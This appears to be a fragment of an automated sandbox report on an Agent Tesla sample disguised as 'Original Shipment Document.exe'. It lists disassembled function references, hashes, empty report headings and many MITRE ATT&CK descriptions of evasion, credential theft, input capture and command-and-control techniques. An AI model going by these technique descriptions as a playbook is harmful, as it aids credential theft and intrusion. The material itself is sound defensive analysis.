Part of subcall function 0044B445: __amsg_exit.LIBCMT ref: 0044B467
Part of subcall function 0044B445: RtlEnterCriticalSection.NTDLL(?), ref: 0044B46F

___sbh_find_block.LIBCMT ref: 0044D5A0
___sbh_free_block.LIBCMT ref: 0044D5AF
HeapFree.KERNEL32(00000000,?,004546D0,0000000C,0044B426,00000000,00454600,0000000C,0044B460,?,?,?,0044F525,00000004,004547D0,0000000C), ref: 0044D5DF
GetLastError.KERNEL32(?,0044F525,00000004,004547D0,0000000C,0044D660,?,?,00000000,00000000,00000000,?,0044D14E,00000001,00000214), ref: 0044D5F0

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: d7cc49a43af6bb8facd156362d230fd3e7ea9525b40131020a389c97f1bbd250
Instruction ID: e35135ec8cf2fa1ea65b21ae953850e4beb6a8e8a34ea65dc0d7b9598029986f
Opcode Fuzzy Hash: d7cc49a43af6bb8facd156362d230fd3e7ea9525b40131020a389c97f1bbd250
Instruction Fuzzy Hash: 8C017C71D02305BAFB206F629C0A75E36A4DF00769F60811FF404AA192DF3CCA408AAC

Uniqueness

Uniqueness Score: -1.00%

Function 0044ECC4, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0044ECD0

Part of subcall function 0044D19C: __getptd_noexit.LIBCMT ref: 0044D19F
Part of subcall function 0044D19C: __amsg_exit.LIBCMT ref: 0044D1AC

__getptd.LIBCMT ref: 0044ECE7
__amsg_exit.LIBCMT ref: 0044ECF5
__lock.LIBCMT ref: 0044ED05

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 5cc13ad909f788839f9a71312cf627ab7657fe974028e084bc0d10f8d881297c
Instruction ID: 2a17e3892b70c71ba094e054be9b2c8ecd658f644857f5c1ad4ffb8e4d53008c
Opcode Fuzzy Hash: 5cc13ad909f788839f9a71312cf627ab7657fe974028e084bc0d10f8d881297c
Instruction Fuzzy Hash: 9DF09071E00B018BF720FB76980675973A0BB40719F14465FE8849B2D2CB3C9942CAAE

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Original Shipment Document.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

SMTP Packets

Function 00405C78, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 00457EFC, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 392
COMMON

Function 00405D84, Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Function 00444250, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 34
COMMON

Function 00457E74, Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Function 0044401C, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Function 004579E0, Relevance: 13.6, APIs: 9, Instructions: 130
windowregistryCOMMON

Function 00456DD0, Relevance: 10.6, APIs: 7, Instructions: 89
COMMON

Function 004576D8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125
windowCOMMON

Function 004565F4, Relevance: 6.1, APIs: 4, Instructions: 99
COMMON

Function 00401A78, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Function 00426A8C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Function 004569B0, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Function 00401590, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Function 004703F8, Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Function 0040728A, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Function 0040728C, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Function 00405A3C, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Function 00401724, Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Function 0041CDB0, Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Function 00443C20, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95
libraryloaderCOMMON

Function 00405AC0, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
stringlibraryfileCOMMON

Function 00454FF0, Relevance: 18.4, APIs: 12, Instructions: 407
windowCOMMON

Function 0044CA64, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 405
nativeCOMMONCrypto

Function 0043F680, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
windowCOMMON

Function 00452548, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 284
windowCOMMONCrypto

Function 004586A0, Relevance: 9.1, APIs: 6, Instructions: 86
windownativeCOMMON

Function 0043ED9C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
windowCOMMON

Function 004585F0, Relevance: 7.6, APIs: 5, Instructions: 59
nativewindowCOMMON

Function 00426BA4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
COMMON

Function 0045BDA0, Relevance: 6.2, APIs: 4, Instructions: 163
windowCOMMON

Function 00416D64, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Function 0043372C, Relevance: 6.0, APIs: 4, Instructions: 46
sleepCOMMON

Function 0043CE20, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Function 0043258C, Relevance: 4.5, APIs: 3, Instructions: 43
clipboardCOMMON

Function 004574D0, Relevance: 4.5, APIs: 3, Instructions: 33
synchronizationthreadCOMMON

Function 004703B0, Relevance: 4.5, APIs: 3, Instructions: 18
timeCOMMON

Function 0043E4F4, Relevance: 3.1, APIs: 2, Instructions: 63
windowCOMMON

Function 00420594, Relevance: 3.0, APIs: 2, Instructions: 46
windowCOMMON

Function 0040ACF0, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Function 00408938, Relevance: 3.0, APIs: 2, Instructions: 33
fileCOMMON

Function 00408B02, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Function 0042E8BC, Relevance: 1.5, APIs: 1, Instructions: 41
nativeCOMMON

Function 00420B24, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre